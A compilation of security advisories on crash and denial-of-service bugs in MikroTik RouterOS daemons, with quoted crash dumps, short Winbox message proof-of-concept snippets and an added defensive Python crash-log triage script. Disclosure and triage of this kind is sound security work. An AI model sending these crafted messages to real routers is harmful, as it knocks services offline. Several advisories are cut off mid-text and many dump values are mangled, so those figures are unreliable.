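    for dump in (USER_DUMP, RESOLVER_DUMP):
        print(triage(dump))
```

On the user dump the result places eip inside libuClibc on SIGABRT (the abort path of the reachable assertion), while on the resolver dump eip lands inside /nova/bin/resolver itself on SIGSEGV.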
[FD] Three vulnerabilities found in MikroTik's RouterOS
Advisory: three vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team


Product Description
===

RouterOS is the operating system used on MikroTik's devices, such as switches, routers and access points.


Description of vulnerabilities
===

1. NULL pointer dereference
The dot1x process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the dot1x process due to a NULL pointer dereference.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.04-14:51:29.47@0:
2020.06.04-14:51:29.47@0:
2020.06.04-14:51:29.81@0: /nova/bin/dot1x
2020.06.04-14:51:29.81@0: --- signal=11
2020.06.04-14:51:29.81@0:
2020.06.04-14:51:29.81@0: eip=0x776a51e5 eflags=0x00010202
2020.06.04-14:51:29.81@0: edi=0x7fc51064 esi=0x08062ed0 ebp=0x7fc50f78 esp=0x7fc50f6c
2020.06.04-14:51:29.81@0: eax=0x ebx=0x776ad4ec ecx=0x edx=0x08062e28
2020.06.04-14:51:29.81@0:
2020.06.04-14:51:29.81@0: maps:
2020.06.04-14:51:29.81@0: 08048000-0805f000 r-xp 00:0c 1064 /nova/bin/dot1x
2020.06.04-14:51:29.81@0: 7764a000-7767f000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.04-14:51:29.81@0: 77683000-7769d000 r-xp 00:0c 960 /lib/libgcc_s.so.1
2020.06.04-14:51:29.81@0: 7769e000-776ad000 r-xp 00:0c 944 /lib/libuc++.so
2020.06.04-14:51:29.81@0: 776ae000-776b4000 r-xp 00:0c 951 /lib/liburadius.so
2020.06.04-14:51:29.81@0: 776b5000-776bd000 r-xp 00:0c 950 /lib/libubox.so
2020.06.04-14:51:29.81@0: 776be000-776db000 r-xp 00:0c 947 /lib/libucrypto.so
2020.06.04-14:51:29.81@0: 776dc000-77728000 r-xp 00:0c 946 /lib/libumsg.so
2020.06.04-14:51:29.81@0: 7772e000-77735000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.06.04-14:51:29.81@0:
2020.06.04-14:51:29.81@0: stack: 0x7fc52000 - 0x7fc50f6c
2020.06.04-14:51:29.81@0: 00 00 00 00 90 27 06 08 e4 8a 72 77 a8 0f c5 7f 2e be 6f 77 90 27 06 08 d0 2e 06 08 28 2e 06 08
2020.06.04-14:51:29.81@0: 28 2e 06 08 a4 0f c5 7f f0 da 6b 77 05 00 00 00 f0 da 6b 77 e0 2d 06 08 64 10 c5 7f e8 0f c5 7f
2020.06.04-14:51:29.81@0:
2020.06.04-14:51:29.81@0: code: 0x776a51e5
2020.06.04-14:51:29.81@0: 8b 10 01 c2 83 c2 04 52 83 c0 04 50 ff 75 08 e8

This vulnerability was initially found in stable 6.46.3, and was fixed in stable 6.47.

2. division by zero
The netwatch process suffers from a division-by-zero vulnerability. By sending a crafted packet, an authenticated remote user can crash the netwatch process due to an arithmetic exception.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.04-16:25:57.65@0:
2020.06.04-16:25:57.65@0:
2020.06.04-16:25:57.65@0: /ram/pckg/advanced-tools/nova/bin/netwatch
2020.06.04-16:25:57.65@0: --- signal=8
2020.06.04-16:25:57.65@0:
2020.06.04-16:25:57.65@0: eip=0x0804c6d7 eflags=0x00010246
2020.06.04-16:25:57.65@0: edi=0x5ed9208c esi=0x ebp=0x73f8 esp=0x73b0
2020.06.04-16:25:57.65@0: eax=0x ebx=0x08051020 ecx=0x edx=0x
2020.06.04-16:25:57.65@0:
2020.06.04-16:25:57.65@0: maps:
2020.06.04-16:25:57.65@0: 08048000-0804d000 r-xp 00:1a 14 /ram/pckg/advanced-tools/nova/bin/netwatch
2020.06.04-16:25:57.65@0: 77f41000-77f76000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.04-16:25:57.65@0: 77f7a000-77f94000 r-xp 00:0c 960 /lib/libgcc_s.so.1
2020.06.04-16:25:57.65@0: 77f95000-77fa4000 r-xp 00:0c 944 /lib/libuc++.so
2020.06.04-16:25:57.65@0: 77fa5000-77ff1000 r-xp 00:0c 946 /lib/libumsg.so
2020.06.04-16:25:57.65@0: 77ff7000-77ffe000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.06.04-16:25:57.65@0:
2020.06.04-16:25:57.65@0: stack: 0x8000 - 0x73b0
2020.06.04-16:25:57.65@0: d8 f4 ff 7f 80 f6 ff 7f 06 00 00 00 d0 f3 ff 7f 84 e5 04 08 0b 00 ff 08 e8 f3 ff 7f 06 00 00 00
2020.06.04-16:25:57.65@0: 20 10 05 08 e4 1a ff 77 f8 f3 ff 7f 22 2c fc 77 d8 f4 ff 7f 0b 00 ff 08 08 f4 ff 7f e4 1a ff 77
2020.06.04-16:25:57.65@0:
2020.06.04-16:25:57.65@0: code: 0x804c6d7
2020.06.04-16:25:57.65@0: f7 f6 8b 53 30 39 c2 73 6e 42 89 53 30 83 ec 0c

This vulnerability was initially found in stable 6.46.2, and was fixed in stable 6.47.

3. memory corruption
The wireless process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the wireless process due to invalid memory
[FD] Two vulnerabilities found in MikroTik's RouterOS
Advisory: two vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team


Product Description
===

RouterOS is the operating system used on MikroTik's devices, such as switches, routers and access points.


Description of vulnerabilities
===

1. NULL pointer dereference
The igmpproxy process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the igmpproxy process due to a NULL pointer dereference.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0: /ram/pckg/multicast/nova/bin/igmpproxy
2020.06.04-17:44:27.12@0: --- signal=11
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0: eip=0x08050a8d eflags=0x00010206
2020.06.04-17:44:27.12@0: edi=0x7fa9331c esi=0x7fa932b8 ebp=0x7fa932a8 esp=0x7fa9326c
2020.06.04-17:44:27.12@0: eax=0x080581bc ebx=0x ecx=0x000b edx=0x
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0: maps:
2020.06.04-17:44:27.12@0: 08048000-08053000 r-xp 00:13 16 /ram/pckg/multicast/nova/bin/igmpproxy
2020.06.04-17:44:27.12@0: 7770b000-7774 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.04-17:44:27.12@0: 77744000-7775e000 r-xp 00:0c 960 /lib/libgcc_s.so.1
2020.06.04-17:44:27.12@0: 7775f000-7776e000 r-xp 00:0c 944 /lib/libuc++.so
2020.06.04-17:44:27.12@0: 7776f000-7000 r-xp 00:0c 950 /lib/libubox.so
2020.06.04-17:44:27.12@0: 8000-777c4000 r-xp 00:0c 946 /lib/libumsg.so
2020.06.04-17:44:27.12@0: 777ca000-777d1000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0: stack: 0x7fa94000 - 0x7fa9326c
2020.06.04-17:44:27.12@0: 01 00 00 00 e8 7f 05 08 10 00 00 00 98 32 a9 7f 11 00 00 00 78 57 05 08 14 33 a9 7f a8 32 a9 7f
2020.06.04-17:44:27.12@0: 67 29 79 77 04 5d 05 08 6c 25 79 77 d8 32 a9 7f e0 57 05 08 b8 32 a9 7f 1c 33 a9 7f d8 32 a9 7f
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0: code: 0x8050a8d
2020.06.04-17:44:27.12@0: 8b 03 ff 30 6a 01 56 e8 77 a8 ff ff 83 c4 0c 0f

This vulnerability was initially found in long-term 6.44.6, and was fixed in stable 6.47.

2. reachable assertion failure
The ipsec process suffers from an assertion failure vulnerability. There is a reachable assertion in the ipsec process. By sending a crafted packet, an authenticated remote user can crash the ipsec process due to assertion failure.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0: /ram/pckg/security/nova/bin/ipsec
2020.06.04-18:25:16.04@0: --- signal=6
2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0: eip=0x7748155b eflags=0x0246
2020.06.04-18:25:16.04@0: edi=0x0001 esi=0x77489200 ebp=0x7f8fa450 esp=0x7f8fa448
2020.06.04-18:25:16.04@0: eax=0x ebx=0x0291 ecx=0x0291 edx=0x0006
2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0: maps:
2020.06.04-18:25:16.04@0: 08048000-080b5000 r-xp 00:11 42 /ram/pckg/security/nova/bin/ipsec
2020.06.04-18:25:16.04@0: 77453000-77488000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.04-18:25:16.04@0: 7748c000-774a6000 r-xp 00:0c 960 /lib/libgcc_s.so.1
2020.06.04-18:25:16.04@0: 774a7000-774b6000 r-xp 00:0c 944 /lib/libuc++.so
2020.06.04-18:25:16.04@0: 774b7000-774b9000 r-xp 00:0c 959 /lib/libdl-0.9.33.2.so
2020.06.04-18:25:16.04@0: 774bb000-774d r-xp 00:1f 15 /ram/pckg/dhcp/lib/libudhcp.so
2020.06.04-18:25:16.04@0: 774d2000-774d8000 r-xp 00:0c 951 /lib/liburadius.so
2020.06.04-18:25:16.04@0: 774d9000-77524000 r-xp 00:0c 956 /lib/libssl.so.1.0.0
2020.06.04-18:25:16.04@0: 77528000-7753 r-xp 00:0c 950 /lib/libubox.so
2020.06.04-18:25:16.04@0: 77531000-7757d000 r-xp 00:0c 946 /lib/libumsg.so
2020.06.04-18:25:16.04@0: 7758-7759d000 r-xp 00:0c 947 /lib/libucrypto.so
2020.06.04-18:25:16.04@0: 7759e000-776fb000 r-xp 00:0c 954 /lib/libcrypto.so.1.0.0
2020.06.04-18:25:16.04@0: 7770e000-77715000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0: stack: 0x7f8fb000 - 0x7f8fa448
2020.06.04-18:25:16.04@0: 00 90 48 77 00 90 48 77 88 a4 8f 7f 77 d0 47 77 06 00 00 00 00 92 48 77 20 00 00 00
[FD] Three vulnerabilities found in MikroTik's RouterOS
Advisory: three vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team


Product Description
===

RouterOS is the operating system used on MikroTik's devices, such as switches, routers and access points.


Description of vulnerabilities
===

1. Memory corruption vulnerability
The diskd process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the diskd process due to invalid memory access.

Against stable 6.44.3, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.04-14:18:22.55@0:
2020.06.04-14:18:22.55@0:
2020.06.04-14:18:22.55@0: /nova/bin/diskd
2020.06.04-14:18:22.55@0: --- signal=11
2020.06.04-14:18:22.55@0:
2020.06.04-14:18:22.55@0: eip=0x776cd1db eflags=0x00010202
2020.06.04-14:18:22.55@0: edi=0x08056760 esi=0x08056790 ebp=0x7fd40b78 esp=0x7fd40b6c
2020.06.04-14:18:22.55@0: eax=0x001b ebx=0x776d54ec ecx=0x776d54ec edx=0x20fe0010
2020.06.04-14:18:22.55@0:
2020.06.04-14:18:22.55@0: maps:
2020.06.04-14:18:22.55@0: 08048000-08052000 r-xp 00:0c 1131 /nova/bin/diskd
2020.06.04-14:18:22.55@0: 77672000-776a7000 r-xp 00:0c 996 /lib/libuClibc-0.9.33.2.so
2020.06.04-14:18:22.55@0: 776ab000-776c5000 r-xp 00:0c 992 /lib/libgcc_s.so.1
2020.06.04-14:18:22.55@0: 776c6000-776d5000 r-xp 00:0c 976 /lib/libuc++.so
2020.06.04-14:18:22.55@0: 776d6000-776de000 r-xp 00:0c 982 /lib/libubox.so
2020.06.04-14:18:22.55@0: 776df000-7772b000 r-xp 00:0c 978 /lib/libumsg.so
2020.06.04-14:18:22.55@0: 77731000-77738000 r-xp 00:0c 990 /lib/ld-uClibc-0.9.33.2.so
2020.06.04-14:18:22.55@0:
2020.06.04-14:18:22.55@0: stack: 0x7fd41000 - 0x7fd40b6c
2020.06.04-14:18:22.55@0: ec 54 6d 77 1b 00 00 00 88 67 05 08 98 0b d4 7f c6 c6 04 08 88 67 05 08 1b 00 00 00 10 00 fe 20
2020.06.04-14:18:22.55@0: 10 00 fe 20 ec 54 6d 77 f0 ea 6d 77 08 0c d4 7f 6d a9 6d 77 88 67 05 08 1b 00 00 00 05 00 00 00
2020.06.04-14:18:22.55@0:
2020.06.04-14:18:22.55@0: code: 0x776cd1db
2020.06.04-14:18:22.55@0: 8b 00 8b 10 01 c2 83 c2 04 52 83 c0 04 50 ff 75

This vulnerability was initially found in long-term 6.44.5, and has been fixed in stable 6.47.

2. NULL pointer dereference vulnerability
The graphing process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the graphing process due to a NULL pointer dereference.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.04-15:12:41.47@0:
2020.06.04-15:12:41.47@0:
2020.06.04-15:12:41.47@0: /nova/bin/graphing
2020.06.04-15:12:41.47@0: --- signal=11
2020.06.04-15:12:41.47@0:
2020.06.04-15:12:41.47@0: eip=0x080521e2 eflags=0x00010202
2020.06.04-15:12:41.47@0: edi=0x080610a0 esi=0x08061cb8 ebp=0x7fa8acd8 esp=0x7fa8acb0
2020.06.04-15:12:41.47@0: eax=0x08061db8 ebx=0x7fa8ad0c ecx=0x edx=0x08061ce8
2020.06.04-15:12:41.47@0:
2020.06.04-15:12:41.47@0: maps:
2020.06.04-15:12:41.47@0: 08048000-0805c000 r-xp 00:0c 1038 /nova/bin/graphing
2020.06.04-15:12:41.47@0: 77651000-77686000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.04-15:12:41.47@0: 7768a000-776a4000 r-xp 00:0c 960 /lib/libgcc_s.so.1
2020.06.04-15:12:41.47@0: 776a5000-776b4000 r-xp 00:0c 944 /lib/libuc++.so
2020.06.04-15:12:41.47@0: 776b5000-776bd000 r-xp 00:0c 950 /lib/libubox.so
2020.06.04-15:12:41.47@0: 776be000-7770a000 r-xp 00:0c 946 /lib/libumsg.so
2020.06.04-15:12:41.47@0: 7770d000-77717000 r-xp 00:0c 961 /lib/libm-0.9.33.2.so
2020.06.04-15:12:41.47@0: 7771c000-77723000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.06.04-15:12:41.47@0:
2020.06.04-15:12:41.47@0: stack: 0x7fa8b000 - 0x7fa8acb0
2020.06.04-15:12:41.47@0: e8 1c 06 08 b8 1d 06 08 00 00 00 00 01 00 00 00 0c ad a8 7f 5b 00 00 00 b8 98 05 08 b8 98 05 08
2020.06.04-15:12:41.47@0: f0 da 6b 77 0c ad a8 7f 28 ad a8 7f 3a bc 6b 77 b8 1c 06 08 0c ad a8 7f 05 00 00 00 a0 10 06 08
2020.06.04-15:12:41.47@0:
2020.06.04-15:12:41.47@0: code: 0x80521e2
2020.06.04-15:12:41.47@0: ff 51 04 83 c4 18 6a 5c 53 e8 a0 9c ff ff 8b 56

This vulnerability was initially found in long-term 6.44.6, and has been fixed in stable 6.47.

3. Stack exhaustion vulnerability
The net process suffers from a stack exhaustion vulnerability. By sending a crafted packet to the net process, an authenticated remote user can trigger a stack
[FD] Four vulnerabilities found in MikroTik's RouterOS
Advisory: four vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Affected Versions: through stable 6.47
Fixed Versions: stable 6.47
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team


Product Description
==

RouterOS is the operating system used on MikroTik's devices, such as switch, router and access point.


Description of vulnerabilities
==

These four vulnerabilities were tested only against the MikroTik RouterOS stable release tree when found. Maybe other release trees also suffer from these vulnerabilities.

PS: The following three memory corruption vulnerabilities are different.

1. NULL pointer dereference vulnerability
The lcdstat process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the lcdstat process due to NULL pointer dereference.

Against stable 6.46.5, the poc resulted in the following crash dump.
# cat /rw/logs/backtrace.log
2020.06.04-15:32:04.67@0:
2020.06.04-15:32:04.67@0:
2020.06.04-15:32:04.67@0: /nova/bin/lcdstat
2020.06.04-15:32:04.67@0: --- signal=11
2020.06.04-15:32:04.67@0:
2020.06.04-15:32:04.67@0: eip=0x0805a26e eflags=0x00010202
2020.06.04-15:32:04.67@0: edi=0x esi=0x7fbeaedc ebp=0x7fbeae18 esp=0x7fbeadf4
2020.06.04-15:32:04.67@0: eax=0x ebx=0x7fbeb848 ecx=0x0807f14c edx=0x0001
2020.06.04-15:32:04.67@0:
2020.06.04-15:32:04.67@0: maps:
2020.06.04-15:32:04.67@0: 08048000-0807e000 r-xp 00:0c 1054 /nova/bin/lcdstat
2020.06.04-15:32:04.67@0: 776fd000-77732000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.04-15:32:04.67@0: 77736000-7775 r-xp 00:0c 960 /lib/libgcc_s.so.1
2020.06.04-15:32:04.67@0: 77751000-7776 r-xp 00:0c 944 /lib/libuc++.so
2020.06.04-15:32:04.67@0: 77761000-77769000 r-xp 00:0c 950 /lib/libubox.so
2020.06.04-15:32:04.67@0: 7776a000-777b6000 r-xp 00:0c 946 /lib/libumsg.so
2020.06.04-15:32:04.67@0: 777bc000-777c3000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.06.04-15:32:04.67@0:
2020.06.04-15:32:04.67@0: stack: 0x7fbeb000 - 0x7fbeadf4
2020.06.04-15:32:04.67@0: 48 b8 be 7f 18 ae be 7f 95 ab 05 08 a0 e5 07 08 00 00 00 00 4c f1 07 08 48 b8 be 7f dc ae be 7f
2020.06.04-15:32:04.67@0: 00 00 00 00 58 ae be 7f 00 ad 05 08 48 b8 be 7f 00 00 00 00 00 00 00 00 ec 04 76 77 d8 af be 7f
2020.06.04-15:32:04.67@0:
2020.06.04-15:32:04.67@0: code: 0x805a26e
2020.06.04-15:32:04.67@0: 8b 70 fc ff 73 78 e8 1f c0 ff ff 8b 46 10 83 c4

2. NULL pointer dereference vulnerability
The lcdstat process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the lcdstat process due to NULL pointer dereference.

Against stable 6.46.5, the poc resulted in the following crash dump.
# cat /rw/logs/backtrace.log
2020.06.04-15:48:13.77@0:
2020.06.04-15:48:13.77@0:
2020.06.04-15:48:13.77@0: /nova/bin/lcdstat
2020.06.04-15:48:13.77@0: --- signal=11
2020.06.04-15:48:13.77@0:
2020.06.04-15:48:13.77@0: eip=0x080562c6 eflags=0x00010246
2020.06.04-15:48:13.77@0: edi=0xff00 esi=0x00ff ebp=0x7fd8cb48 esp=0x7fd8cb2c
2020.06.04-15:48:13.77@0: eax=0x ebx=0x ecx=0x edx=0x
2020.06.04-15:48:13.77@0:
2020.06.04-15:48:13.77@0: maps:
2020.06.04-15:48:13.77@0: 08048000-0807e000 r-xp 00:0c 1054 /nova/bin/lcdstat
2020.06.04-15:48:13.77@0: 776be000-776f3000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.04-15:48:13.77@0: 776f7000-77711000 r-xp 00:0c 960 /lib/libgcc_s.so.1
2020.06.04-15:48:13.77@0: 77712000-77721000 r-xp 00:0c 944 /lib/libuc++.so
2020.06.04-15:48:13.77@0: 77722000-7772a000 r-xp 00:0c 950 /lib/libubox.so
2020.06.04-15:48:13.77@0: 7772b000-7000 r-xp 00:0c 946 /lib/libumsg.so
2020.06.04-15:48:13.77@0: d000-77784000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.06.04-15:48:13.77@0:
2020.06.04-15:48:13.77@0: stack: 0x7fd8d000 - 0x7fd8cb2c
2020.06.04-15:48:13.77@0: 00 00 00 00 00 00 00 01 80 c1 77 77 01 00 00 00 38 d4 d8 7f 50 5f 08 08 a8 5c 08 08 78 cb d8 7f
2020.06.04-15:48:13.77@0: 79 a2 05 08 78 36 08 08 00 00 00 00 00 de 77 77 8f cf d8 7f ff ff ff ff a8 5d 08 08 00 36 08 08
2020.06.04-15:48:13.77@0:
2020.06.04-15:48:13.77@0: code: 0x80562c6
2020.06.04-15:48:13.77@0: 88 1c 02 89 f3 88 5c 02 01 89 fb 88 5c 02 02 05

3. NULL pointer dereference vulnerability
The lcdstat process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated
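The crash dumps quoted in these advisories all share one layout in /rw/logs/backtrace.log: the crashing process image, the signal, the register set, the memory maps, a stack excerpt and the code bytes at eip. The Python script below is an added example, not code from the advisories, from MikroTik or from the reporter: it parses that layout, attributes the faulting eip to a mapped image and gives a rough triage verdict (signal 6 as an assertion failure or abort, signal 11 with zeroed registers as a likely NULL pointer dereference), which is what a defender wants when the same nova daemon keeps restarting. The embedded sample is constructed: the first record is an abbreviated copy of the lcdstat dump above, the second (the /nova/bin/example image, its addresses and its signal 6) is invented for the abort branch. A register written as "eax=0x" with no digits, which is how zero values appear in the archived posts, is read as 0. All function names are mine.

```python
import re
from collections import Counter

# Constructed sample. Record 1 is abbreviated from the lcdstat dump in the advisory above;
# record 2 (/nova/bin/example, signal 6, its addresses) is invented to exercise the abort branch.
SAMPLE_LOG = """\
2020.06.04-15:32:04.67@0: /nova/bin/lcdstat
2020.06.04-15:32:04.67@0: --- signal=11
2020.06.04-15:32:04.67@0:
2020.06.04-15:32:04.67@0: eip=0x0805a26e eflags=0x00010202
2020.06.04-15:32:04.67@0: edi=0x esi=0x7fbeaedc ebp=0x7fbeae18 esp=0x7fbeadf4
2020.06.04-15:32:04.67@0: eax=0x ebx=0x7fbeb848 ecx=0x0807f14c edx=0x0001
2020.06.04-15:32:04.67@0: maps:
2020.06.04-15:32:04.67@0: 08048000-0807e000 r-xp 00:0c 1054 /nova/bin/lcdstat
2020.06.04-15:32:04.67@0: 776fd000-77732000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.04-15:32:04.67@0: stack: 0x7fbeb000 - 0x7fbeadf4
2020.06.04-15:32:04.67@0: 48 b8 be 7f 18 ae be 7f 95 ab 05 08 a0 e5 07 08
2020.06.04-15:32:04.67@0: code: 0x805a26e
2020.06.04-15:32:04.67@0: 8b 70 fc ff 73 78 e8 1f c0 ff ff 8b 46 10 83 c4
2020.06.05-09:00:00.00@0: /nova/bin/example
2020.06.05-09:00:00.00@0: --- signal=6
2020.06.05-09:00:00.00@0: eip=0x776cd1db eflags=0x0246
2020.06.05-09:00:00.00@0: eax=0x ebx=0x0006 ecx=0x0006 edx=0x0001
2020.06.05-09:00:00.00@0: maps:
2020.06.05-09:00:00.00@0: 08048000-0804d000 r-xp 00:0c 1000 /nova/bin/example
2020.06.05-09:00:00.00@0: 776a0000-776d5000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so
"""

_LINE = re.compile(r'^(?P<ts>\S+?)@\d+:\s?(?P<body>.*)$')       # "TIMESTAMP@cpu: payload"
_REG = re.compile(r'\b([a-z]{3,6})=0x([0-9a-fA-F]*)')           # eip=0x..., eflags=0x..., eax=0x
_MAP = re.compile(r'^([0-9a-f]+)-([0-9a-f]*)\s+\S+\s+\S+\s+\d+\s+(\S+)$')


def parse_backtrace(text):
    """Split backtrace.log into crash records, one per crashing process image."""
    records, cur, section = [], None, None
    for raw in text.splitlines():
        m = _LINE.match(raw)
        if not m:
            continue
        body = m.group('body').strip()
        if not body:
            continue
        if body.startswith('/') and section != 'maps':           # a process path opens a record
            cur = {'time': m.group('ts'), 'process': body, 'signal': None,
                   'regs': {}, 'maps': [], 'code': b''}
            records.append(cur)
            section = 'header'
        elif cur is None:
            continue
        elif body.startswith('--- signal='):
            cur['signal'] = int(body.split('=', 1)[1])
        elif body.startswith(('maps:', 'stack:', 'code:')):
            section = body.split(':', 1)[0]
        elif section == 'header':
            for name, val in _REG.findall(body):
                cur['regs'][name] = int(val, 16) if val else 0      # "0x" with no digits -> 0
        elif section == 'maps':
            mm = _MAP.match(body)
            if mm:
                end = int(mm.group(2), 16) if mm.group(2) else None  # garbled ranges keep no end
                cur['maps'].append((int(mm.group(1), 16), end, mm.group(3)))
        elif section == 'code':
            try:
                cur['code'] += bytes.fromhex(body)
            except ValueError:
                pass                                                 # tolerate garbled hex
    return records


def module_at(rec, addr):
    """Name the mapped image containing addr (normally eip), or None if unknown."""
    for start, end, path in rec['maps']:
        if end is not None and start <= addr < end:
            return path
    return None


def classify(rec):
    """Heuristic triage from signal and register state; not a proof of root cause."""
    if rec['signal'] == 6:
        return 'SIGABRT: assertion failure or explicit abort'
    if rec['signal'] == 11:
        zero = [r for r in ('eax', 'ebx', 'ecx', 'edx', 'esi', 'edi') if rec['regs'].get(r) == 0]
        if zero:
            return 'SIGSEGV with zeroed %s: likely NULL pointer dereference' % ','.join(zero)
        return 'SIGSEGV: invalid memory access'
    return 'signal %s' % rec['signal']


def summarize(text):
    """One triage line per crash: when, which image, which module eip was in, verdict."""
    out = []
    for r in parse_backtrace(text):
        eip = r['regs'].get('eip')
        out.append({'time': r['time'], 'process': r['process'], 'signal': r['signal'],
                    'module': module_at(r, eip) if eip is not None else None,
                    'verdict': classify(r)})
    return out


def crash_counts(text):
    """Crashes per process image; a daemon that keeps dying is the thing to alert on."""
    return Counter(r['process'] for r in parse_backtrace(text))


if __name__ == '__main__':
    for s in summarize(SAMPLE_LOG):
        print(s)
    print(crash_counts(SAMPLE_LOG))
```

The verdict is only a hint: a zeroed eax is common in healthy code, so confirming a NULL dereference still means disassembling the code bytes at eip against the register the instruction actually dereferences. The per-process count is the useful operational signal, since a daemon that crashes again after every restart is what distinguishes a triggered bug from a one-off.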
[FD] Two vulnerabilities found in MikroTik's RouterOS
Advisory: two vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Affected Versions: until stable 6.45.7 (first vulnerability), until stable 6.46.4 (second vulnerability)
Fixed Versions: stable 6.46.x (first vulnerability), stable 6.46.5 (second vulnerability)
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team


Product Description
==

RouterOS is the operating system used on MikroTik's devices, such as switch, router and access point.


Description of vulnerabilities
==

These two vulnerabilities were tested only against the MikroTik RouterOS stable release tree when found. Maybe other release trees also suffer from these vulnerabilities.

1. The cerm process suffers from an uncontrolled resource consumption issue. By sending a crafted packet, an authenticated remote user can cause a high CPU load, which may make the device respond slowly or be unable to respond.

2. The traceroute process suffers from a memory corruption issue. By sending a crafted packet, an authenticated remote user can crash the traceroute process due to invalid memory access.


Solution

Upgrade to the corresponding latest RouterOS tree version.


References
==

[1] https://mikrotik.com/download/changelogs/stable-release-tree

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] Two vulnerabilities found in MikroTik's RouterOS
[Update 2020/04/14] The latest stable release tree 6.46.5 still suffers from these two vulnerabilities.


Details
===

Product: MikroTik's RouterOS
Affected Versions: through 6.46.5 (stable release tree)
Fixed Versions: -
Vendor URL: https://mikrotik.com/
Vendor Status: not fixed yet
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team


Poc
===

The following pocs are based on the tool routeros (https://github.com/tenable/routeros)

1) memory corruption in console process

    WinboxMessage msg;
    msg.set_to(48, 4);
    msg.set_command(0xfe0005);
    msg.add_u32(0xfe000c, -1);
    msg.add_u32(9, 9);

2) assertion failure in console process

    WinboxMessage msg;
    msg.set_to(48, 4);
    msg.set_command(0xfe0005);
    msg.add_u32(0xfe0001, 0);


Disclosure timeline
===

2019/08/23  reported the 2nd issue to the vendor
2019/08/26  reported the 1st issue to the vendor
2019/08/28  vendor reproduced the 1st issue and will fix it as soon as possible
2019/08/30  vendor reproduced the 2nd issue and will fix it as soon as possible
2019/12/02  notified the vendor that the 1st issue still exists in version 6.44.6 (2nd issue fixed)
2020/01/06  no response from the vendor, and did the initial disclosure
2020/04/14  re-tested these two issues against the stable 6.46.5, and updated the disclosure

On Mon, Jan 6, 2020 at 7:32 PM, Q C wrote:

> Advisory: two vulnerabilities found in MikroTik's RouterOS
>
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Affected Versions: before 6.44.6 (Long-term release tree)
> Fixed Versions: 6.44.6 (Long-term release tree)
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>
>
> Product Description
> ==
>
> RouterOS is the operating system used on MikroTik's devices, such as
> switch, router and access point.
>
>
> Description of vulnerabilities
> ==
>
> These two vulnerabilities were tested only against the MikroTik RouterOS
> long-term release tree when found. Maybe other release trees also suffer
> from these issues.
>
> 1. The console process suffers from a memory corruption issue.
